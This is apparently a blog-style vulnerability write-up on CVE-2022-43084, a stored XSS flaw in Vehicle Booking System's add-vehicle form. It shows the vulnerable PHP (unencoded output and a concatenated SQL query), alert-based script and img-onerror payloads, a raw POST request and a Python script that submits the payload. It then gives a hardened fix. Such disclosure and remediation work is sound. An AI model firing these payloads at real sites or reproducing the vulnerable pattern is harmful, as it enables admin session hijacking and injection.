Cross-Site Scripting (XSS) is a major web security concern. Attackers can inject malicious scripts into web applications, which may lead to stolen cookies, session hijacking, or redirecting users to harmful sites. In this article, we’ll dive into a real-world stored XSS vulnerability tracked as CVE-2022-43084, affecting Vehicle Booking System v1.0. We’ll break down how the flaw works, explore its exploitability, and show how it can be fixed.

Overview of CVE-2022-43084

CVE-2022-43084 is a stored Cross-Site Scripting (XSS) vulnerability in the admin-add-vehicle.php file of Vehicle Booking System v1.0. Anyone who can submit the add-vehicle form can store arbitrary JavaScript in the v_name parameter; the script then runs in the browser of every admin who views a page that renders that vehicle’s name. Because the script executes with the admin’s session, it can steal sensitive information or perform actions in the admin’s name, up to a takeover of the admin account.

- NVD Database Entry
- Vehicle Booking System on SourceCodester
- Exploit Details on Exploit-DB
- OWASP XSS Basics

How the Vulnerability Works

Let’s get technical. The file admin-add-vehicle.php provides a backend form for adding vehicles. A user with the right privileges can submit new vehicle information, such as the vehicle name (v_name). The vulnerability exists because the server-side code neither validates the value on the way in nor HTML-encodes it on the way out: whatever was stored is written into the page exactly as submitted.

Here’s a simplified look at the vulnerable part of admin-add-vehicle.php:

<?php
// ... other code ...
if (isset($_POST['submit'])) {
    // Raw, unvalidated user input
    $v_name = $_POST['v_name'];
    // Interpolated straight into the SQL string (no prepared statement)
    $query = "INSERT INTO vehicles (v_name, ...) VALUES ('$v_name', ...)";
    mysqli_query($conn, $query);
}
?>
<!-- Later, displaying vehicle name somewhere on the admin panel -->
<!-- Echoed into HTML with no encoding: the stored value is parsed as markup -->
<td><?php echo $row['v_name']; ?></td>

The value of v_name is taken straight from the request and written to the database, and when it is read back it is echoed into the HTML unchanged. Anything in the stored value that looks like markup is therefore parsed as markup by the admin’s browser, which is exactly what a stored XSS payload needs.

Step 1: Crafting the Payload

An attacker sets v_name to something like:

"><script>alert('XSS');</script>

The leading "> closes any attribute or tag the value might land in; in the plain table cell shown above, the script element alone is enough to execute.

Step 2: Submitting the Payload

Using a tool like Burp Suite, Postman, or even the browser’s developer tools, submit the following POST request to add a new vehicle (shown unencoded for readability; in a real form submission the payload is URL-encoded as form data):

POST /admin-add-vehicle.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded

v_name="><script>alert('XSS')</script>&other_parameters=...

When the injected vehicle is displayed on any admin panel page, the script fires.

(Screenshot: Exploit Demonstration)

Result: An alert box appears, proving JavaScript execution in the admin’s browser. An attacker could replace alert('XSS') with any JavaScript, including code to steal admin cookies, redirect users, or deface the site.

Here’s a simple Python script using requests to automate the payload submission:

import requests

# Target URL of the vulnerable add-vehicle handler (placeholder host)
url = 'http://target-site.com/admin-add-vehicle.php'

# Stored XSS payload: an <img> whose onerror handler runs when the broken image fails to load
data = {
    'v_name': '"><img src=x onerror=alert("XSS")>',
    'other_param': 'value',   # remaining form fields the handler expects
    'submit': '1',
}

session = requests.Session()
# The handler lives in the admin area: log in first (or set an existing admin cookie)
# if the application enforces authentication on this endpoint.
response = session.post(url, data=data)
response.raise_for_status()
print("Payload sent. Check the admin panel for the XSS pop-up.")

Impact

- Theft of Admin Session Cookies: a payload can read document.cookie and send it to an attacker-controlled server. If the session cookie is marked HttpOnly the script cannot read it, but it can still issue requests to the admin panel with the victim’s session, so the impact is reduced rather than removed.

How to Fix It

1. Encode Output: escape data at the point it is written into HTML, for example with htmlspecialchars($value, ENT_QUOTES, 'UTF-8'), or use a templating library that escapes by default. Stripping tags from input is not a substitute: the same value may be rendered in several places, and encoding at output time covers all of them.


2. Use Prepared Statements: when writing user input to the database, bind it as a parameter (mysqli or PDO) instead of interpolating it into the SQL string. This does not stop XSS by itself, since the payload is stored intact, but it removes the SQL injection risk of the concatenated query shown above.
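As an added example, not code from Vehicle Booking System or from the original write-up, here is a hardened version of the add-vehicle handler that applies both points above: the value is bound with a prepared statement on the way in and HTML-encoded at the exact point it is echoed on the way out. The e() and validate_vehicle_name() helpers are hypothetical, $conn is assumed to be an open mysqli connection, the mbstring extension is assumed to be available, and the vehicles table is assumed to have a single v_name column for brevity.

```php
<?php
// Hardened add-vehicle handler (illustrative example, not the project's own code).
// Assumes: $conn is an open mysqli connection; table `vehicles` has a `v_name` column.

declare(strict_types=1);

/** HTML-encode a value for an element body or a quoted attribute. */
function e(string $value): string
{
    // ENT_QUOTES encodes both " and ' so the value is safe inside either attribute quote style;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Light input validation: a vehicle name is short, printable text. Returns null if invalid. */
function validate_vehicle_name(string $raw): ?string
{
    $name = trim($raw);
    if ($name === '' || mb_strlen($name, 'UTF-8') > 100) {
        return null;
    }
    // Reject control characters only; angle brackets and quotes are allowed because
    // output encoding, not input filtering, is what prevents XSS.
    if (preg_match('/[\x00-\x1F\x7F]/u', $name) === 1) {
        return null;
    }
    return $name;
}

if (isset($_POST['submit'])) {
    $v_name = validate_vehicle_name((string) ($_POST['v_name'] ?? ''));
    if ($v_name === null) {
        http_response_code(400);
        exit('Invalid vehicle name');
    }

    // Prepared statement: the value is bound as a parameter, never interpolated into SQL.
    $stmt = $conn->prepare('INSERT INTO vehicles (v_name) VALUES (?)');
    $stmt->bind_param('s', $v_name);
    $stmt->execute();
    $stmt->close();
}

// Listing: encode at output time, so a stored payload is rendered as text, not markup.
$result = $conn->query('SELECT v_name FROM vehicles');
while ($row = $result->fetch_assoc()) {
    echo '<td>' . e($row['v_name']) . '</td>' . PHP_EOL;
}
```

With the payload from Step 1, "><script>alert('XSS');</script>, e() returns &quot;&gt;&lt;script&gt;alert(&#039;XSS&#039;);&lt;/script&gt;, which the browser shows as literal text inside the cell. Note that htmlspecialchars() is the right encoder for HTML element bodies and quoted attributes only; if the vehicle name is ever placed inside a JavaScript string, a URL, or a CSS value, that context needs its own encoder, as described in the OWASP XSS Prevention Cheat Sheet.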

Conclusion

CVE-2022-43084 shows how a single unchecked input can open the gates to a serious flaw like Cross-Site Scripting. If you are building administration panels or any kind of web interface, always validate user-supplied input and encode it for the context in which it is rendered. For more reading on similar vulnerabilities, check OWASP’s XSS Cheat Sheet.

References

- CVE-2022-43084 @ NVD
- Vehicle Booking System Download
- Exploit Proof-of-Concept

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/02/2022 12:48:00 UTC